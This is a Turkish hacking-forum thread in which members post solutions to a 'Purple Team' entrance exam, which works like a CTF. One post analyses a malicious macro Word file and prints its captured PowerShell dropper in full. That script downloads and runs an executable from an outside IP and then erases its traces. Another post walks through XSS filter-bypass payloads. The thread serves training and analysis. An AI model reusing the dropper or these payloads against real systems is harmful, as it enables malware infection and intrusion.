THT DUYURU

chat
Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

takipci
Seçenekler

Purple Team Sınav Sorusu Çözümleri

P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.899
Konular:
554
Teşekkür (Etti):
1472
Teşekkür (Aldı):
2905
Ticaret:
(0) %
13
1067
16-05-2020 22:33
#1
Merhabalar arkadaşlar, yakın bir süreçte alımlarımız tekrardan açılacaktır. Sizlere ekip alımımızda ne tür sorular sorduğumuzu göstermek maksadıyla böyle bir konu hazırladık. Ancak bu çözümlü sorular, sınavda sorduğumuz soruların bir kısmıdır, bilginize...
---------------------



purple-team@turkhackteam.org

Konu P4RS tarafından (1 gün önce Saat 14:38 ) değiştirilmiştir.
whitend06 - ait Kullanıcı Resmi (Avatar)
Senior Pentester & Hunter
Üyelik tarihi:
04/2020
Mesajlar:
19
Konular:
2
Teşekkür (Etti):
9
Teşekkür (Aldı):
62
Ticaret:
(0) %
21-05-2020 00:45
#2
Merhaba arkadaşlar. Purple Team giriş sınavı için verilen sorulardan 5. soruyu (Zararlı Yazılım Analizi Yapmaya Ne Dersin?) elimden geldiği kadar çözümü yaptıklarımı paylaşmaya çalışacağım.
Doğrum vardır, yanlışım vardır; zaman ayırıp yanlışlarımı düzeltirseniz sevinirim

(Not: Forum üzerinde açtığım ilk konudur sürçü lisan edersem affola )

Soruda verilen https://drive.google.com/file/d/1gB8...ew?usp=sharing url adresine gidildiği zaman baddoc.rar isimli bir rar dosya indirilmektedir. Dosya içerisinde ki veri çıkartılmak istenildiği zaman şifre ile karşılaşılmaktadır.
rar2john aracını kullanarak parolanın hashlenmiş hali ele geçirilir.



Bulunan hash değeri hashcat aracı ile rockyou.txt wordlisti kullanılarak kırılır.



Şifre “infected” olarak bulunur ve dosya çıkartılır.
Windows defender analiz yapılacağı için kapatılır. Dosya Microsoft Word programında açılır. Makrolara izin verilir.



Analize ilk olarak osquery üzerinden başlanır ve makrolara izin verdikten sonra çalıştırılan processes lere bakılır.



Microsoft Word tarafından çalıştırılan processler “parent” filtresi ile word’ün pid değeri yazılarak ulaşılır ve aynı işlem bulunan processler içinde tekralanır.





Bulunan processlerin çalıştırdıkları komut satırlarına bakılır.



5080 pid numaralı process’in “C:\Windows\system32\cmd.exe /c c:\Users\kazim\AppData\Local\Temp\adobeacd-update.bat” komutunu,
5068 pid numaralı process’in “cscript.exe "c:\Users\kazim\AppData\Local\Temp\adobeacd-update"".""v""bs"” komutunu ve
908 pid numaralı process’in “"C:\Windows\System32\WindowsPowerShell\v1.0\power shell.exe" -noexit -ExecutionPolicy bypass -noprofile -file C:\Users\kazim\AppData\Local\Temp\adobeacd-update.ps1” komutunu çalıştırdığı tespit edilmiştir.

powershell üzerinde yapılan işlemlerin detaylarını öğrenebilmek; Osquery üzerinde “Select * from powershell_events;” komutu çalıştırılmış ancak group policy ayarlının yapılmış olmasına rağmen herhangi bir sonuç alınamamıştır.



Belkide osquery üzerinde konfigürasyon ayarlarının yapılması gerekmektedir ancak detaylı bilgim olmadığından dolayı manuel inceleme yapmaya karar verilmiştir.

Logların incenlenmesi için; EventViewer uygulamasına gidilmiştir. EventViewer üzerinde “Uygulama ve Hizmet Günlükleri > Microsoft > Windows > PowerShell” sekmesine gidilmiştir.



Event ID değeri 4104 olan operational powershell loglarının incelenmesine başlanmıştır.
Event ID değeri 4104 olan logların detayı için https://docs.microsoft.com/en-us/pow...w=powershell-7 adresine gidebilirsiniz. Ayrıca windows logları hakkında daha detaylı bilgiyi https://www.ultimatewindowssecurity..../encyclopedia/ sayfasından ulaşabilirsiniz.

1. logda;



Kod:
“$down = New-Object System.Net.WebClient;
$url  = 'http://91.220.131.44/upd/install.exe';
$file = 'c:\Users\kazim\AppData\Local\Temp\444.exe';
$down.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
$down.DownloadFile($url,$file);
$ScriptDir = $MyInvocation.ScriptName;
$someFilePath = 'c:\Users\kazim\AppData\Local\Temp\444.exe';
$vbsFilePath = 'c:\Users\kazim\AppData\Local\Temp\adobeacd-update'+'.'+'v'+'bs';
$batFilePath = 'c:\Users\kazim\AppData\Local\Temp\adobeacd-update'+'.'+'b'+'at';
$psFilePath = 'c:\Users\kazim\AppData\Local\Temp\adobeacd-update'+'.'+'p'+'s1';
Start-Sleep -s 15;
cmd.exe /c  'c:\Users\kazim\AppData\Local\Temp\444.exe';     
$file1 = gci $vbsFilePath -Force
$file2 = gci $batFilePath -Force
$file3 = gci $psFilePath -Force
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }
If (Test-Path $batFilePath){ Remove-Item $batFilePath }
$psHello = 'aisdjhiqowhdiq';
If (Test-Path $someFilePath){ Remove-Item $someFilePath }
Remove-Item $MyINvocation.InvocationName”
Komutunun çalıştırıldığı görülmüştür. Bir IOC verisi olarak “91.220.131.44” IP adresi ve bu adresten indirilen dosyanın temp altına “c:\Users\kazim\AppData\Local\Temp\444.exe';” adı ile kayıt edildiği tespit edilmiştir.

2. logda;



Kod:
“if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
{
    $myinv = $_.InvocationInfo
    if ($myinv -and $myinv.MyCommand)
    {
        switch -regex ( $myinv.MyCommand.CommandType )
        {
            ([System.Management.Automation.CommandTypes]::ExternalScript)
            {
                if ($myinv.MyCommand.Path)
                {
                    $myinv.MyCommand.Path + " : "
                }
                break
            }
            ([System.Management.Automation.CommandTypes]::Script)
            {
                if ($myinv.MyCommand.ScriptBlock)
                {
                    $myinv.MyCommand.ScriptBlock.ToString() + " : "
                }
                break
            }
            default
            {
                if ($myinv.InvocationName -match '^[&\.]?$')
                {
                    if ($myinv.MyCommand.Name)
                    {
                        $myinv.MyCommand.Name + " : "
                    }
                }
                else
                {
                    $myinv.InvocationName + " : "
                }
                break
            }
        }
    }
    elseif ($myinv -and $myinv.InvocationName)
    {
        $myinv.InvocationName + " : "
    }
}”

Komutunun çalıştığı gözlemlenmiştir.
3.logda;



Kod:
“if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
“if ($_.FullyQualifiedErrorId -eq "NativeCommandErrorMessage") {
    $_.Exception.Message   
}
else
{
    $myinv = $_.InvocationInfo
    if ($myinv -and ($myinv.MyCommand -or ($_.CategoryInfo.Category -ne 'ParserError'))) {
        $posmsg = $myinv.PositionMessage
    } else {
        $posmsg = ""
    }
    
    if ($posmsg -ne "")
    {
        $posmsg = "`n" + $posmsg
    }

    if ( & { Set-StrictMode -Version 1; $_.PSMessageDetails } ) {
        $posmsg = " : " +  $_.PSMessageDetails + $posmsg 
    }

    $indent = 4
    $width = $host.UI.RawUI.BufferSize.Width - $indent - 2

    $errorCategoryMsg = & { Set-StrictMode -Version 1; $_.ErrorCategory_Message }
    if ($errorCategoryMsg -ne $null)
    {
        $indentString = "+ CategoryInfo          : " + $_.ErrorCategory_Message
    }
    else
    {
        $indentString = "+ CategoryInfo          : " + $_.CategoryInfo
    }
    $posmsg += "`n"
    foreach($line in @($indentString -split "(.{$width})")) { if($line) { $posmsg += (" " * $indent + $line) } }

    $indentString = "+ FullyQualifiedErrorId : " + $_.FullyQualifiedErrorId
    $posmsg += "`n"
    foreach($line in @($indentString -split "(.{$width})")) { if($line) { $posmsg += (" " * $indent + $line) } }

    $originInfo = & { Set-StrictMode -Version 1; $_.OriginInfo }
    if (($originInfo -ne $null) -and ($originInfo.PSComputerName -ne $null))
    {
        $indentString = "+ PSComputerName        : " + $originInfo.PSComputerName
        $posmsg += "`n"
        foreach($line in @($indentString -split "(.{$width})")) { if($line) { $posmsg += (" " * $indent + $line) } }
    }

    if ($ErrorView -eq "CategoryView") {
        $_.CategoryInfo.GetMessage()
    }
    elseif (! $_.ErrorDetails -or ! $_.ErrorDetails.Message) {
        $_.Exception.Message + $posmsg + "`n "
    } else {
        $_.ErrorDetails.Message + $posmsg
    }
}”
Komutunun çalıştırıldığı görülmüştür.
İncelenen diğer loğlarda kıymetli bir IOC verisinin olmadığı görülmüştür.

Son olarak Wireshark programı çalıştırılıp Word dosyası tekrar tetiklendiğinde resim üzerinde görülen sonuçlara ulaşılmıştır. “1.1.2.2” ip adresine ping atıldığı ve “52.109.88.126” ip adresine “Client Hello” yazan bir mesaj gönderildiği gözlemlenmiştir.



VirusTotal üzerinde yapılan arama sonucunda dosyanın hash bilgilerine ulaşılmıştır.
MD5: a3b613d128aace09241504e8acc678c2
SHA-1: edde71ccadfad1380b881da5ecafc77fba5885b8
SHA-256: 8b92c23b29422131acc150fa1ebac67e1b0b0f8cfc1b727805 b842a88de447de




Arkadaşlarım elimden geldiği kadar yaptığım analiz budur.
Geri bildirimleriniz için şimdiden teşekkürler
Konu P4RS tarafından (1 gün önce Saat 14:34 ) değiştirilmiştir.
NAK0 - ait Kullanıcı Resmi (Avatar)
Pentester & Hunter
Üyelik tarihi:
12/2015
Mesajlar:
47
Konular:
1
Teşekkür (Etti):
97
Teşekkür (Aldı):
30
Ticaret:
(0) %
23-05-2020 16:47
#3
XSS Güzel Mi ?

Merhaba arkadaşlar. Purple Team giriş sınavı için verilen sorulardan 2. sorunun(XSS Güzel Mi ?) çözümü aşağıdaki gibidir.

Soruda verilen http://142.93.175.236/sınav-soru/ web adresine gittiğimizde bizleri böyle bir sayfa karşılıyor.




Sayfanın kaynak kodlarını görüntülüyoruz. Sayfanın en altında bizleri böyle bir şey karşılıyor.




Kod:
adasdasdsadffgdfgdfgfdd.php
url kısmına ekleyip devam ediyoruz.





Yeni karşılaştığımız sayfanında kaynak kodlarını görüntülüyoruz.





?xss= komutunu görüyoruz URL kısmına bunu da ekleyerek kaynak kodlarını tekrar incelemeye başlıyoruz.




Şimdi sisteme alert verdirtmek için gerekli işlemlere başlıyoruz.

Payload olarak <script>alert(1)</script> payloadımızı giriyoruz.



Yukarıdaki resimde görmüş olduğumuz gibi ekrana <>(1) yazdı. Burdan sunu anlıyoruz ki script tagları filitrelenmiş. Ama normalde alert(1) yazması gerekirdi. Ama ilk önce sadece küçük script tagı mı filitrelenmiş ona bakalım.



Yukarıdaki resimde olduğu gibi kullanmış olduğumuz bu <SCRIPT>alert(1)</SCRIPT> payload herhangi bir sonuç vermedi.
Bunun üzerine iç içe script deniyoruz.

<sc<script>ript>alert(1)</sc</script>ript> payloadımızı deniyoruz



Ekrana ript>(1)ript> yazdı.
Artık script değilde başka birşeyler deniyelim.
Dördüncü olarak <svg onload=alert(1)> payloadımızı deniyoruz.



Yukarıdaki resimde görmüş olduğumuz gibi bu payload'ımızla bir sonuç alamadık. Scriptin yanı sıra önceki işlemlerimiz de alert de sorun var gibiydi. Bu yüzden yine aynı payload fakat alert ile benzer olan prompt kullanalım.Şu şekilde;
<svg onload=prompt(1)>



Yukarıdaki resimde olduğu gibi sisteme alert verdirmeyi başardık.
--------------------- "Ruhlarımız buluşur elbet Tanrı Dağı'nda"
Konu P4RS tarafından (1 gün önce Saat 14:36 ) değiştirilmiştir.
Quality38 - ait Kullanıcı Resmi (Avatar)
Pentester & Hunter
Üyelik tarihi:
01/2017
Mesajlar:
1.197
Konular:
207
Teşekkür (Etti):
187
Teşekkür (Aldı):
195
Ticaret:
(0) %
24-05-2020 22:04
#4
Merhaba arkadaşlar,
3. sorunun (OSquery ile Zararlı Yazılım Analizi) çözümlerini detaylı bir şekilde bir video serisi halinde anlattım. Mikrofonumum sadece oldların hatırlayacağı 35TL'lik kameralı mikrofon olmasından dolayı sesim çok kötü şimdiden kulaklarınız için özür dilerim... Dip sesi temizleyebildiğim kadar temizledim.

Konuyu ilk fırsatta (finaller biter bitmez) resimli ve yazılı bir şekilde güncellemiş olurum inşalllah. (Video işine yeni giriştim, olumlu/olumsuz eleştirilerinizi bekliyorum ayrıca pls)

Uzatmadan sırayla videoları aşağıya bırakıyorum.
Saygılar...


1- Ubuntu Server Kurulumu (16.04 LTS) - VMware Sanal PC Kurma
- Ubuntu Server İndirme Linki (Son Sürüm): https://ubuntu.com/download/server
- Videoda kullanılan versiyon (16.04 LTS) indirme sayfası: https://releases.ubuntu.com/16.04/


2- Windows 7 Kurulumu - VMware Sanal PC Kurma
ÖNEMLİ NOT:
Bu videoda Windows 7 32 Bit kurulmuştur fakat ilerleyen aşamalarda, 32 bit Osquery ile çalışmadığı için Windows 7 64 bit kurulumu yapılmıştır. O yüzden 32 BİT YERİNE 64 BİT KURMALISINIZ
.

-Windows 7 64 bit ISO İndirme Linki: Windows 7 64 Bit


3- Kali Linux 2020 (2020.2) Kurulumu
- Kali Linux 2020.2 İndirme Linki:https://www.kali.org/downloads/


4-VMware Ağ Konfigürasyonu


5- Osquery İle Zararlı Yazılım Analizi 1 - Kolide Fleet Kurulumu


6- Osquery ile Zararlı Yazılım Analizi 2 | Kolide Fleet Host Ekleme - Windows Osquery Kurulumu
-Kolide Launcher Linki v0.9.3: https://github.com/kolide/launcher/releases?after=0.9.4
-Osquery İndirme linki: https://osquery.io/downloads/official/4.3.0


7- Osquery ile Zararlı Yazılım Analizi 3 | Osquery ile Temel Zararlı Yazılım Analizi

---------------------
Tabutlara sığmayacak kadar intihar var, şeytanın siparişi
dünyanın ninnisi olmuş sirenler, ya RAB bizi özler!
...
Konu Quality38 tarafından (24-05-2020 22:18 Saat 22:18 ) değiştirilmiştir. Sebep: Video ekleme olayını test ediyordum
P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.899
Konular:
554
Teşekkür (Etti):
1472
Teşekkür (Aldı):
2905
Ticaret:
(0) %
1 gün önce
#5
Merhabalar arkadaşlar, yakın bir süreçte alımlarımız tekrardan açılacaktır. Sizlere ekip alımımızda ne tür sorular sorduğumuzu göstermek maksadıyla böyle bir konu hazırladık. Ancak bu çözümlü sorular, sınavda sorduğumuz soruların bir kısmıdır, bilginize...
---------------------



purple-team@turkhackteam.org

"Bin4ry - ait Kullanıcı Resmi (Avatar)
Hunter
Üyelik tarihi:
08/2019
Nereden:
Malware
Mesajlar:
1.264
Konular:
93
Ticaret:
(0) %
1 gün önce
#6
Elinize sağlık efsane yazmışsıniz
---------------------
This is a "Rozz"
profes0r Teşekkür etti.
S4RP1NG0 - ait Kullanıcı Resmi (Avatar)
Pentester
Üyelik tarihi:
06/2019
Nereden:
Ankara
Yaş:
27
Mesajlar:
40
Konular:
6
Teşekkür (Etti):
22
Teşekkür (Aldı):
4
Ticaret:
(0) %
1 gün önce
#7
Ellerinize sağlık süper konu
RTFM - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
04/2019
Mesajlar:
174
Konular:
44
Teşekkür (Etti):
131
Teşekkür (Aldı):
246
Ticaret:
(0) %
1 gün önce
#8
Elinize sağlık arkadaşlar, konu çok güzel olmuş
---------------------
Vatan ne Türkiye'dir Türklere ne Türkistan/Vatan, büyük ve müebbet bir ülkedir Türklere Turan
profes0r, P4RS, ShadowGirl, "aqua, Mamilost Teşekkür etti.
TurkishHacker01 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
06/2020
Nereden:
bilmiyorum
Mesajlar:
32
Konular:
7
Teşekkür (Etti):
40
Teşekkür (Aldı):
16
Ticaret:
(0) %
1 gün önce
#9
Hojam bu sene haksızlık oldu, sınav ertelenecek dendi geri çekildi ve sıralamalar çok yükseldi. Tht bu sene zor sordu, zararlı yazilım konusu çıkmayacak dendi ama soruldu. Seneye tekrar hazırlanacam purpble tim ilk 15K ile alıyordu değil mi ?



---------------------
disparaa Teşekkür etti.
profes0r - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
04/2020
Nereden:
Colombia
Mesajlar:
698
Konular:
126
Teşekkür (Etti):
803
Teşekkür (Aldı):
219
Ticaret:
(0) %
1 gün önce
#10
Alıntı:
TurkishHacker01´isimli üyeden Alıntı Mesajı göster
Hojam bu sene haksızlık oldu, sınav ertelenecek dendi geri çekildi ve sıralamalar çok yükseldi. Tht bu sene zor sordu, zararlı yazilım konusu çıkmayacak dendi ama soruldu. Seneye tekrar hazırlanacam purpble tim ilk 15K ile alıyordu değil mi ?



Dostum ban ymek mi istiyorsun
---------------------
εℓвεт вιя güη gεяçεкℓεя güη үüzüηε çıктığıη∂α нεℓαℓℓιк ιsтεмεүιη.çüηкü нαккıмı нεℓαℓ εтмιүσяυм
Aseray
Baysal,Yakamoz1319
Edros Detretus
TurkishHacker01 Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler